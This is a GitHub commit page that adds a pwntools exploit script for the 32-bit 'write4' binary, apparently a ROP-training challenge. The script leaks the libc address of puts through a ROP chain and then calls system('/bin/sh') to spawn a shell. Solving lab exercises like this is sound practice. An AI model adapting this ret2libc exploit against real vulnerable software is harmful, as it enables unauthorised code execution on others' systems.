Skip to content

Commit

Permalink
exploit for 32-bit write4 binary
Browse files Browse the repository at this point in the history
  • Loading branch information
@AravGarg
AravGarg authored Mar 28, 2020
1 parent ddccc73 commit fbf1c74
Showing 1 changed file with 36 additions and 0 deletions.
36 changes: 36 additions & 0 deletions write432.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
from pwn import *
target=process('./write432')
elf=ELF('write432')
libc=elf.libc
print(target.recvuntil("already!\n> "))
payload="A"*44

puts_plt=0x08048420
puts_got=0x0804a014
pwnme=0x080485f6
popret=0x080486db

payload+=p32(puts_plt)
payload+=p32(popret)
payload+=p32(puts_got)
payload+=p32(pwnme)
payload+=p32(0x0)

target.sendline(payload)
leak=target.recv()[0:4]
#leak=target.recvuntil("\x0a").strip("\x0a")
libc_puts=u32(leak+"\x00"*(4-len(leak)))
libc_base=libc_puts-libc.symbols["puts"]
print(hex(libc_base))
libc_system=libc_base+libc.symbols["system"]
libc_binsh=libc_base+libc.search("/bin/sh\x00").next()

payload="A"*44

payload+=p32(libc_system)
payload+=p32(0xdeadbeef)
payload+=p32(libc_binsh)

target.sendline(payload)
target.interactive()

0 comments on commit fbf1c74

Please sign in to comment.